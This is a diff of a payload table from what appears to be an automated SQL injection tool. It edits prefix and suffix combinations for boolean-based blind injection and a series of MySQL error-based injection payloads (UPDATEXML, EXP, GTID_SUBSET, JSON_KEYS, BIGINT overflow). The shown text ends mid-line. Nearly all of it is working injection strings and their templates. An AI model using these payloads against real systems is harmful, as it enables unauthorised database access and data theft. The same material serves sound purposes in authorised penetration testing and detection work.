skipped 223 lines 224 224 "comments": [ 225 225 {"pref": " ", "suf": ""}, 226 226 {"pref": " ", "suf": "-- wXyW"}, 227 + {"pref": ") ", "suf": " AND (04586=4586"}, 227 228 {"pref": "' ", "suf": "-- wXyW"}, 228 229 {"pref": '" ', "suf": "-- wXyW"}, 229 - # {"pref": ") ", "suf": "-- wXyW"}, 230 + {"pref": ") ", "suf": "-- wXyW"}, 230 231 {"pref": "') ", "suf": "-- wXyW"}, 231 - # {"pref": '") ', "suf": "-- wXyW"}, 232 - {"pref": " ", "suf": " OR 3 * 2 * 1 =6 - - wXyW "}, 233 - {"pref": "' ", "suf": " OR '1 '='1 - - wXyW "}, 234 - {"pref": '" ', "suf": ' OR "1 "="1 - - wXyW '}, 235 - {"pref": "' ", "suf": " AND '1 '='1 - - wXyW "}, 236 - {"pref": '" ', "suf": ' AND "1 "="1 - - wXyW '}, 237 - # {"pref": ") ", "suf": " OR (1 =1 - - wXyW "}, 238 - # {"pref": ") " , "suf": " AND (1 =1 - - wXyW "}, 239 - # {"pref": "') ", "suf": " OR ( '1 '='1 -- wXyW "}, 240 - # {"pref": '") ', "suf": ' OR ( "1 "="1 -- wXyW '}, 241 - # {"pref": "') ", "suf": " AND ('1'='1-- wXyW"}, 242 - # {"pref": '") ', "suf": ' AND ("1"="1-- wXyW'}, 232 + {"pref": '") ', "suf": "-- wXyW"}, 233 + {"pref": ") ", "suf": " OR ( 04586 =4586 "}, 234 + {"pref": "') ", "suf": " AND ( '04586 '='4586 "}, 235 + {"pref": '") ', "suf": ' AND ( "04586 "="4586 '}, 236 + {"pref": "' ", "suf": " AND '04586 '='4586 "}, 237 + {"pref": '" ', "suf": ' AND "04586 "="4586 '}, 238 + {"pref": "' ) ", "suf": " OR (' 04586 ' =' 4586 "}, 239 + {"pref": ' ") ' , "suf": ' OR (" 04586 " ="4586 ' }, 240 + {"pref": "' ", "suf": " OR '04586 '='4586 --"}, 241 + {"pref": '" ', "suf": ' OR "04586 "="4586 --'}, 243 242 ], 244 243 "title": "AND boolean-based blind - WHERE or HAVING clause", 245 244 "vector": "AND [INFERENCE]", skipped 9 lines 255 254 {"pref": ") ", "suf": "-- wXyW"}, 256 255 {"pref": "') ", "suf": "-- wXyW"}, 257 256 {"pref": '") ', "suf": "-- wXyW"}, 258 - # {"pref": " ", "suf": " AND 3 * 2 * 1 =6 - - wXyW "}, 259 - # {"pref": "' ", "suf": " OR ' 1 ' =' 1 - - wXyW "}, 260 - # {"pref": '" ' , "suf": ' OR " 1 " ="1 - - wXyW ' }, 261 - # {"pref": " ' ", "suf": " AND ' 1 ' =' 1 - - wXyW "}, 262 - # {"pref": ' " ', "suf": ' AND " 1 " ="1 - - wXyW ' }, 263 - # {"pref": ") " , "suf": " OR ( 1 =1 - - wXyW "}, 264 - # {"pref": ") ", "suf": " AND (1 =1 - - wXyW "}, 265 - # {"pref": " ') " , "suf": " OR (' 1 ' =' 1 - - wXyW "}, 266 - # {"pref": '") ' , "suf": ' OR ( " 1 " =" 1 -- wXyW ' }, 267 - # {"pref": "') " , "suf": " AND ( ' 1 ' =' 1 -- wXyW " }, 268 - # {"pref": '") ', "suf": ' AND ("1"="1-- wXyW'}, 257 + {"pref": ") ", "suf": " AND ( 04586 =4586 "}, 258 + # {"pref": ") ", "suf": " OR ( 04586 =4586 "}, 259 + {"pref": " ') ", "suf": " AND ( ' 04586 ' =' 4586 "}, 260 + {"pref": '") ' , "suf": ' AND ( " 04586 " ="4586 ' }, 261 + {"pref": "' " , "suf": " AND ' 04586 ' =' 4586 "}, 262 + {"pref": ' " ' , "suf": ' AND " 04586 " ="4586 ' }, 263 + # {"pref": "' ) ", "suf": " OR (' 04586 ' =' 4586 "}, 264 + # {"pref": '" ) ' , "suf": ' OR (" 04586 " ="4586 ' }, 265 + # {"pref": " ' ", "suf": " OR ' 04586 ' =' 4586 --" }, 266 + # {"pref": ' " ', "suf": ' OR " 04586 " =" 4586 --' }, 269 267 ], 270 268 "title": "OR boolean-based blind - WHERE or HAVING clause (NOT)", 271 269 "vector": "OR NOT [INFERENCE]", skipped 6 lines 278 276 {"pref": " ", "suf": "-- wXyW"}, 279 277 {"pref": "' ", "suf": "-- wXyW"}, 280 278 {"pref": '" ', "suf": "-- wXyW"}, 281 - # {"pref": ") ", "suf": "-- wXyW"}, 279 + {"pref": ") ", "suf": "-- wXyW"}, 282 280 {"pref": "') ", "suf": "-- wXyW"}, 283 - # {"pref": '") ', "suf": "-- wXyW"}, 284 - {"pref": " ", "suf": " AND 3 * 2 * 1 =6 - - wXyW "}, 285 - {"pref": "' ", "suf": " OR ' 1 ' =' 1 - - wXyW "}, 286 - {"pref": '" ' , "suf": ' OR " 1 " =" 1 - - wXyW '}, 287 - {"pref": "' " , "suf": " AND ' 1 ' ='1 - - wXyW " }, 288 - {"pref": ' " ', "suf": ' AND " 1 " =" 1 - - wXyW '}, 289 - # {"pref": ") " , "suf": " OR ( 1 =1 - - wXyW "}, 290 - # {"pref": ") ", "suf": " AND (1 =1 - - wXyW "}, 291 - # {"pref": " ') " , "suf": " OR (' 1 ' ='1 - - wXyW " }, 292 - # {"pref": ' ") ' , "suf": ' OR ( " 1 " =" 1 -- wXyW ' }, 293 - # {"pref": "') " , "suf": " AND ( ' 1 ' =' 1 -- wXyW " }, 294 - # {"pref": '") ', "suf": ' AND ("1"="1-- wXyW'}, 281 + {"pref": '") ', "suf": "-- wXyW"}, 282 + {"pref": ") ", "suf": " AND ( 04586 =4586 "}, 283 + {"pref": ") ", "suf": " OR ( 04586 =4586 "}, 284 + {"pref": " ') ", "suf": " AND ( ' 04586 ' ='4586 " }, 285 + {"pref": ' ") ', "suf": ' AND ( " 04586 " =" 4586 '}, 286 + {"pref": "' " , "suf": " AND ' 04586 ' ='4586 " }, 287 + {"pref": ' " ' , "suf": ' AND " 04586 " ="4586 ' }, 288 + {"pref": "' ) ", "suf": " OR (' 04586 ' =' 4586 "}, 289 + {"pref": '" ) ' , "suf": ' OR (" 04586 " =" 4586 '}, 290 + {"pref": "' " , "suf": " OR ' 04586 ' =' 4586 --" }, 291 + {"pref": ' " ', "suf": ' OR " 04586 " =" 4586 --' }, 295 292 ], 296 293 "title": "OR boolean-based blind - WHERE or HAVING clause", 297 294 "vector": "OR [INFERENCE]", skipped 187 lines 485 482 }, 486 483 ], 487 484 "error-based": [ 485 + # { 486 + # "payload": "AND (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)", 487 + # "comments": [ 488 + # # {"pref": " ", "suf": ""}, 489 + # {"pref": " ", "suf": "-- wXyW"}, 490 + # {"pref": " ", "suf": "#"}, 491 + # # {"pref": "' ", "suf": ""}, 492 + # {"pref": "' ", "suf": "-- wXyW"}, 493 + # {"pref": "' ", "suf": "#"}, 494 + # # {"pref": '" ', "suf": ""}, 495 + # {"pref": '" ', "suf": "-- wXyW"}, 496 + # {"pref": '" ', "suf": "#"}, 497 + # # {"pref": ") ", "suf": ""}, 498 + # {"pref": ") ", "suf": "-- wXyW"}, 499 + # {"pref": ") ", "suf": "#"}, 500 + # # {"pref": "') ", "suf": ""}, 501 + # {"pref": "') ", "suf": "-- wXyW"}, 502 + # {"pref": "') ", "suf": "#"}, 503 + # # {"pref": '") ', "suf": ""}, 504 + # {"pref": '") ', "suf": "-- wXyW"}, 505 + # {"pref": '") ', "suf": "#"}, 506 + # ], 507 + # "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)", 508 + # "vector": "AND (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)", 509 + # "dbms": "MySQL", 510 + # }, 511 + # { 512 + # "payload": "OR (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)", 513 + # "comments": [ 514 + # # {"pref": " ", "suf": ""}, 515 + # {"pref": " ", "suf": "-- wXyW"}, 516 + # {"pref": " ", "suf": "#"}, 517 + # # {"pref": "' ", "suf": ""}, 518 + # {"pref": "' ", "suf": "-- wXyW"}, 519 + # {"pref": "' ", "suf": "#"}, 520 + # # {"pref": '" ', "suf": ""}, 521 + # {"pref": '" ', "suf": "-- wXyW"}, 522 + # {"pref": '" ', "suf": "#"}, 523 + # # {"pref": ") ", "suf": ""}, 524 + # {"pref": ") ", "suf": "-- wXyW"}, 525 + # {"pref": ") ", "suf": "#"}, 526 + # # {"pref": "') ", "suf": ""}, 527 + # {"pref": "') ", "suf": "-- wXyW"}, 528 + # {"pref": "') ", "suf": "#"}, 529 + # # {"pref": '") ', "suf": ""}, 530 + # {"pref": '") ', "suf": "-- wXyW"}, 531 + # {"pref": '") ', "suf": "#"}, 532 + # ], 533 + # "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)", 534 + # "vector": "OR (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)", 535 + # "dbms": "MySQL", 536 + # }, 537 + # { 538 + # "payload": "AND EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)e)x))", 539 + # "comments": [ 540 + # # {"pref": " ", "suf": ""}, 541 + # {"pref": " ", "suf": "-- wXyW"}, 542 + # {"pref": " ", "suf": "#"}, 543 + # # {"pref": "' ", "suf": ""}, 544 + # {"pref": "' ", "suf": "-- wXyW"}, 545 + # {"pref": "' ", "suf": "#"}, 546 + # # {"pref": '" ', "suf": ""}, 547 + # {"pref": '" ', "suf": "-- wXyW"}, 548 + # {"pref": '" ', "suf": "#"}, 549 + # # {"pref": ") ", "suf": ""}, 550 + # {"pref": ") ", "suf": "-- wXyW"}, 551 + # {"pref": ") ", "suf": "#"}, 552 + # # {"pref": "') ", "suf": ""}, 553 + # {"pref": "') ", "suf": "-- wXyW"}, 554 + # {"pref": "') ", "suf": "#"}, 555 + # # {"pref": '") ', "suf": ""}, 556 + # {"pref": '") ', "suf": "-- wXyW"}, 557 + # {"pref": '") ', "suf": "#"}, 558 + # ], 559 + # "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)", 560 + # "vector": "AND EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)e)x))", 561 + # "dbms": "MySQL", 562 + # }, 563 + # { 564 + # "payload": "OR EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)e)x))", 565 + # "comments": [ 566 + # # {"pref": " ", "suf": ""}, 567 + # {"pref": " ", "suf": "-- wXyW"}, 568 + # {"pref": " ", "suf": "#"}, 569 + # # {"pref": "' ", "suf": ""}, 570 + # {"pref": "' ", "suf": "-- wXyW"}, 571 + # {"pref": "' ", "suf": "#"}, 572 + # # {"pref": '" ', "suf": ""}, 573 + # {"pref": '" ', "suf": "-- wXyW"}, 574 + # {"pref": '" ', "suf": "#"}, 575 + # # {"pref": ") ", "suf": ""}, 576 + # {"pref": ") ", "suf": "-- wXyW"}, 577 + # {"pref": ") ", "suf": "#"}, 578 + # # {"pref": "') ", "suf": ""}, 579 + # {"pref": "') ", "suf": "-- wXyW"}, 580 + # {"pref": "') ", "suf": "#"}, 581 + # # {"pref": '") ', "suf": ""}, 582 + # {"pref": '") ', "suf": "-- wXyW"}, 583 + # {"pref": '") ', "suf": "#"}, 584 + # ], 585 + # "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)", 586 + # "vector": "OR EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)e)x))", 587 + # "dbms": "MySQL", 588 + # }, 589 + # { 590 + # "payload": "AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)", 591 + # "comments": [ 592 + # # {"pref": " ", "suf": ""}, 593 + # {"pref": " ", "suf": "-- wXyW"}, 594 + # {"pref": " ", "suf": "#"}, 595 + # # {"pref": "' ", "suf": ""}, 596 + # {"pref": "' ", "suf": "-- wXyW"}, 597 + # {"pref": "' ", "suf": "#"}, 598 + # # {"pref": '" ', "suf": ""}, 599 + # {"pref": '" ', "suf": "-- wXyW"}, 600 + # {"pref": '" ', "suf": "#"}, 601 + # # {"pref": ") ", "suf": ""}, 602 + # {"pref": ") ", "suf": "-- wXyW"}, 603 + # {"pref": ") ", "suf": "#"}, 604 + # # {"pref": "') ", "suf": ""}, 605 + # {"pref": "') ", "suf": "-- wXyW"}, 606 + # {"pref": "') ", "suf": "#"}, 607 + # # {"pref": '") ', "suf": ""}, 608 + # {"pref": '") ', "suf": "-- wXyW"}, 609 + # {"pref": '") ', "suf": "#"}, 610 + # ], 611 + # "title": "MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)", 612 + # "vector": "AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44),1337)", 613 + # "dbms": "MySQL", 614 + # }, 615 + # { 616 + # "payload": "OR GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)", 617 + # "comments": [ 618 + # # {"pref": " ", "suf": ""}, 619 + # {"pref": " ", "suf": "-- wXyW"}, 620 + # {"pref": " ", "suf": "#"}, 621 + # # {"pref": "' ", "suf": ""}, 622 + # {"pref": "' ", "suf": "-- wXyW"}, 623 + # {"pref": "' ", "suf": "#"}, 624 + # # {"pref": '" ', "suf": ""}, 625 + # {"pref": '" ', "suf": "-- wXyW"}, 626 + # {"pref": '" ', "suf": "#"}, 627 + # # {"pref": ") ", "suf": ""}, 628 + # {"pref": ") ", "suf": "-- wXyW"}, 629 + # {"pref": ") ", "suf": "#"}, 630 + # # {"pref": "') ", "suf": ""}, 631 + # {"pref": "') ", "suf": "-- wXyW"}, 632 + # {"pref": "') ", "suf": "#"}, 633 + # # {"pref": '") ', "suf": ""}, 634 + # {"pref": '") ', "suf": "-- wXyW"}, 635 + # {"pref": '") ', "suf": "#"}, 636 + # ], 637 + # "title": "MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)", 638 + # "vector": "OR GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44),1337)", 639 + # "dbms": "MySQL", 640 + # }, 641 + # { 642 + # "payload": "AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)) USING utf8)))", 643 + # "comments": [ 644 + # # {"pref": " ", "suf": ""}, 645 + # {"pref": " ", "suf": "-- wXyW"}, 646 + # {"pref": " ", "suf": "#"}, 647 + # # {"pref": "' ", "suf": ""}, 648 + # {"pref": "' ", "suf": "-- wXyW"}, 649 + # {"pref": "' ", "suf": "#"}, 650 + # # {"pref": '" ', "suf": ""}, 651 + # {"pref": '" ', "suf": "-- wXyW"}, 652 + # {"pref": '" ', "suf": "#"}, 653 + # # {"pref": ") ", "suf": ""}, 654 + # {"pref": ") ", "suf": "-- wXyW"}, 655 + # {"pref": ") ", "suf": "#"}, 656 + # # {"pref": "') ", "suf": ""}, 657 + # {"pref": "') ", "suf": "-- wXyW"}, 658 + # {"pref": "') ", "suf": "#"}, 659 + # # {"pref": '") ', "suf": ""}, 660 + # {"pref": '") ', "suf": "-- wXyW"}, 661 + # {"pref": '") ', "suf": "#"}, 662 + # ], 663 + # "title": "MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)", 664 + # "vector": "AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)) USING utf8)))", 665 + # "dbms": "MySQL", 666 + # }, 667 + # { 668 + # "payload": "OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)) USING utf8)))", 669 + # "comments": [ 670 + # # {"pref": " ", "suf": ""}, 671 + # {"pref": " ", "suf": "-- wXyW"}, 672 + # {"pref": " ", "suf": "#"}, 673 + # # {"pref": "' ", "suf": ""}, 674 + # {"pref": "' ", "suf": "-- wXyW"}, 675 + # {"pref": "' ", "suf": "#"}, 676 + # # {"pref": '" ', "suf": ""}, 677 + # {"pref": '" ', "suf": "-- wXyW"}, 678 + # {"pref": '" ', "suf": "#"}, 679 + # # {"pref": ") ", "suf": ""}, 680 + # {"pref": ") ", "suf": "-- wXyW"}, 681 + # {"pref": ") ", "suf": "#"}, 682 + # # {"pref": "') ", "suf": ""}, 683 + # {"pref": "') ", "suf": "-- wXyW"}, 684 + # {"pref": "') ", "suf": "#"}, 685 + # # {"pref": '") ', "suf": ""}, 686 + # {"pref": '") ', "suf": "-- wXyW"}, 687 + # {"pref": '") ', "suf": "#"}, 688 + # ], 689 + # "title": "MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)", 690 + # "vector": "OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)) USING utf8)))", 691 + # "dbms": "MySQL", 692 + # }, 693 + # { 694 + # "payload": "AND (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)", 695 + # "comments": [ 696 + # # {"pref": " ", "suf": ""}, 697 + # {"pref": " ", "suf": "-- wXyW"}, 698 + # {"pref": " ", "suf": "#"}, 699 + # # {"pref": "' ", "suf": ""}, 700 + # {"pref": "' ", "suf": "-- wXyW"}, 701 + # {"pref": "' ", "suf": "#"}, 702 + # # {"pref": '" ', "suf": ""}, 703 + # {"pref": '" ', "suf": "-- wXyW"}, 704 + # {"pref": '" ', "suf": "#"}, 705 + # # {"pref": ") ", "suf": ""}, 706 + # {"pref": ") ", "suf": "-- wXyW"}, 707 + # {"pref": ") ", "suf": "#"}, 708 + # # {"pref": "') ", "suf": ""}, 709 + # {"pref": "') ", "suf": "-- wXyW"}, 710 + # {"pref": "') ", "suf": "#"}, 711 + # # {"pref": '") ', "suf": ""}, 712 + # {"pref": '") ', "suf": "-- wXyW"}, 713 + # {"pref": '") ', "suf": "#"}, 714 + # ], 715 + # "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (DOUBLE)", 716 + # "vector": "AND (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)", 717 + # "dbms": "MySQL", 718 + # }, 719 + # { 720 + # "payload": "OR (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)", 721 + # "comments": [ 722 + # # {"pref": " ", "suf": ""}, 723 + # {"pref": " ", "suf": "-- wXyW"}, 724 + # {"pref": " ", "suf": "#"}, 725 + # # {"pref": "' ", "suf": ""}, 726 + # {"pref": "' ", "suf": "-- wXyW"}, 727 + # {"pref": "' ", "suf": "#"}, 728 + # # {"pref": '" ', "suf": ""}, 729 + # {"pref": '" ', "suf": "-- wXyW"}, 730 + # {"pref": '" ', "suf": "#"}, 731 + # # {"pref": ") ", "suf": ""}, 732 + # {"pref": ") ", "suf": "-- wXyW"}, 733 + # {"pref": ") ", "suf": "#"}, 734 + # # {"pref": "') ", "suf": ""}, 735 + # {"pref": "') ", "suf": "-- wXyW"}, 736 + # {"pref": "') ", "suf": "#"}, 737 + # # {"pref": '") ', "suf": ""}, 738 + # {"pref": '") ', "suf": "-- wXyW"}, 739 + # {"pref": '") ', "suf": "#"}, 740 + # ], 741 + # "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (DOUBLE)", 742 + # "vector": "OR (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)", 743 + # "dbms": "MySQL", 744 + # }, 488 745 { 489 - "payload": "AND ( SELECT (! x - ~ 0) FROM ( SELECT CONCAT_WS(0x28,0x496e6a65637465647e ,0x72306f746833783439,0x7e454e44 )x ) y )", 746 + "payload": "AND UPDATEXML (0, CONCAT_WS(0x28,0x7e ,0x72306f746833783439,0x7e ), 0 )", 490 747 "comments": [ 491 748 # {"pref": " ", "suf": ""}, 492 749 {"pref": " ", "suf": "-- wXyW"}, 750 + {"pref": " ", "suf": "#"}, 493 751 # {"pref": "' ", "suf": ""}, 494 752 {"pref": "' ", "suf": "-- wXyW"}, 753 + {"pref": "' ", "suf": "#"}, 495 754 # {"pref": '" ', "suf": ""}, 496 755 {"pref": '" ', "suf": "-- wXyW"}, 756 + {"pref": '" ', "suf": "#"}, 497 757 # {"pref": ") ", "suf": ""}, 498 758 {"pref": ") ", "suf": "-- wXyW"}, 759 + {"pref": ") ", "suf": "#"}, 499 760 # {"pref": "') ", "suf": ""}, 500 761 {"pref": "') ", "suf": "-- wXyW"}, 762 + {"pref": "') ", "suf": "#"}, 501 763 # {"pref": '") ', "suf": ""}, 502 764 {"pref": '") ', "suf": "-- wXyW"}, 765 + {"pref": '") ', "suf": "#"}, 503 766 ], 504 - "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED )", 505 - "vector": "AND ( SELECT (! x - ~ 0) FROM ( SELECT CONCAT_WS(0x28,0x496e6a65637465647e ,[INFERENCE],0x7e454e44 )x ) y )", 767 + "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML )", 768 + "vector": "AND UPDATEXML (0, CONCAT_WS(0x28,0x7e ,[INFERENCE],0x7e ), 0 )", 506 769 "dbms": "MySQL", 507 770 }, 508 771 { 509 - "payload": "OR (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)", 772 + "payload": "AND UPDATEXML(0,CONCAT_WS('r0oth3x49'),0)", 510 773 "comments": [ 511 774 # {"pref": " ", "suf": ""}, 512 775 {"pref": " ", "suf": "-- wXyW"}, 776 + {"pref": " ", "suf": "#"}, 513 777 # {"pref": "' ", "suf": ""}, 514 778 {"pref": "' ", "suf": "-- wXyW"}, 779 + {"pref": "' ", "suf": "#"}, 515 780 # {"pref": '" ', "suf": ""}, 516 781 {"pref": '" ', "suf": "-- wXyW"}, 782 + {"pref": '" ', "suf": "#"}, 517 783 # {"pref": ") ", "suf": ""}, 518 784 {"pref": ") ", "suf": "-- wXyW"}, 785 + {"pref": ") ", "suf": "#"}, 519 786 # {"pref": "') ", "suf": ""}, 520 787 {"pref": "') ", "suf": "-- wXyW"}, 788 + {"pref": "') ", "suf": "#"}, 521 789 # {"pref": '") ', "suf": ""}, 522 790 {"pref": '") ', "suf": "-- wXyW"}, 791 + {"pref": '") ', "suf": "#"}, 523 792 ], 524 - "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED )", 525 - "vector": "OR (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)", 526 - "dbms": "MySQL", 527 - }, 528 - { 529 - "payload": "AND EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)e)x))", 530 - "comments": [ 531 - # {"pref": " ", "suf": ""}, 532 - {"pref": " ", "suf": "-- wXyW"}, 533 - # {"pref": "' ", "suf": ""}, 534 - {"pref": "' ", "suf": "-- wXyW"}, 535 - # {"pref": '" ', "suf": ""}, 536 - {"pref": '" ', "suf": "-- wXyW"}, 537 - # {"pref": ") ", "suf": ""}, 538 - {"pref": ") ", "suf": "-- wXyW"}, 539 - # {"pref": "') ", "suf": ""}, 540 - {"pref": "') ", "suf": "-- wXyW"}, 541 - # {"pref": '") ', "suf": ""}, 542 - {"pref": '") ', "suf": "-- wXyW"}, 543 - ], 544 - "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)", 545 - "vector": "AND EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)e)x))", 546 - "dbms": "MySQL", 547 - }, 548 - { 549 - "payload": "OR EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)e)x))", 550 - "comments": [ 551 - # {"pref": " ", "suf": ""}, 552 - {"pref": " ", "suf": "-- wXyW"}, 553 - # {"pref": "' ", "suf": ""}, 554 - {"pref": "' ", "suf": "-- wXyW"}, 555 - # {"pref": '" ', "suf": ""}, 556 - {"pref": '" ', "suf": "-- wXyW"}, 557 - # {"pref": ") ", "suf": ""}, 558 - {"pref": ") ", "suf": "-- wXyW"}, 559 - # {"pref": "') ", "suf": ""}, 560 - {"pref": "') ", "suf": "-- wXyW"}, 561 - # {"pref": '") ', "suf": ""}, 562 - {"pref": '") ', "suf": "-- wXyW"}, 563 - ], 564 - "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)", 565 - "vector": "OR EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)e)x))", 566 - "dbms": "MySQL", 567 - }, 568 - { 569 - "payload": "AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)", 570 - "comments": [ 571 - # {"pref": " ", "suf": ""}, 572 - {"pref": " ", "suf": "-- wXyW"}, 573 - # {"pref": "' ", "suf": ""}, 574 - {"pref": "' ", "suf": "-- wXyW"}, 575 - # {"pref": '" ', "suf": ""}, 576 - {"pref": '" ', "suf": "-- wXyW"}, 577 - # {"pref": ") ", "suf": ""}, 578 - {"pref": ") ", "suf": "-- wXyW"}, 579 - # {"pref": "') ", "suf": ""}, 580 - {"pref": "') ", "suf": "-- wXyW"}, 581 - # {"pref": '") ', "suf": ""}, 582 - {"pref": '") ', "suf": "-- wXyW"}, 583 - ], 584 - "title": "MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)", 585 - "vector": "AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44),1337)", 586 - "dbms": "MySQL", 587 - }, 588 - { 589 - "payload": "OR GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)", 590 - "comments": [ 591 - # {"pref": " ", "suf": ""}, 592 - {"pref": " ", "suf": "-- wXyW"}, 593 - # {"pref": "' ", "suf": ""}, 594 - {"pref": "' ", "suf": "-- wXyW"}, 595 - # {"pref": '" ', "suf": ""}, 596 - {"pref": '" ', "suf": "-- wXyW"}, 597 - # {"pref": ") ", "suf": ""}, 598 - {"pref": ") ", "suf": "-- wXyW"}, 599 - # {"pref": "') ", "suf": ""}, 600 - {"pref": "') ", "suf": "-- wXyW"}, 601 - # {"pref": '") ', "suf": ""}, 602 - {"pref": '") ', "suf": "-- wXyW"}, 603 - ], 604 - "title": "MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)", 605 - "vector": "OR GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44),1337)", 606 - "dbms": "MySQL", 607 - }, 608 - { 609 - "payload": "AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)) USING utf8)))", 610 - "comments": [ 611 - # {"pref": " ", "suf": ""}, 612 - {"pref": " ", "suf": "-- wXyW"}, 613 - # {"pref": "' ", "suf": ""}, 614 - {"pref": "' ", "suf": "-- wXyW"}, 615 - # {"pref": '" ', "suf": ""}, 616 - {"pref": '" ', "suf": "-- wXyW"}, 617 - # {"pref": ") ", "suf": ""}, 618 - {"pref": ") ", "suf": "-- wXyW"}, 619 - # {"pref": "') ", "suf": ""}, 620 - {"pref": "') ", "suf": "-- wXyW"}, 621 - # {"pref": '") ', "suf": ""}, 622 - {"pref": '") ', "suf": "-- wXyW"}, 623 - ], 624 - "title": "MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)", 625 - "vector": "AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)) USING utf8)))", 626 - "dbms": "MySQL", 627 - }, 628 - { 629 - "payload": "OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)) USING utf8)))", 630 - "comments": [ 631 - # {"pref": " ", "suf": ""}, 632 - {"pref": " ", "suf": "-- wXyW"}, 633 - # {"pref": "' ", "suf": ""}, 634 - {"pref": "' ", "suf": "-- wXyW"}, 635 - # {"pref": '" ', "suf": ""}, 636 - {"pref": '" ', "suf": "-- wXyW"}, 637 - # {"pref": ") ", "suf": ""}, 638 - {"pref": ") ", "suf": "-- wXyW"}, 639 - # {"pref": "') ", "suf": ""}, 640 - {"pref": "') ", "suf": "-- wXyW"}, 641 - # {"pref": '") ', "suf": ""}, 642 - {"pref": '") ', "suf": "-- wXyW"}, 643 - ], 644 - "title": "MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)", 645 - "vector": "OR 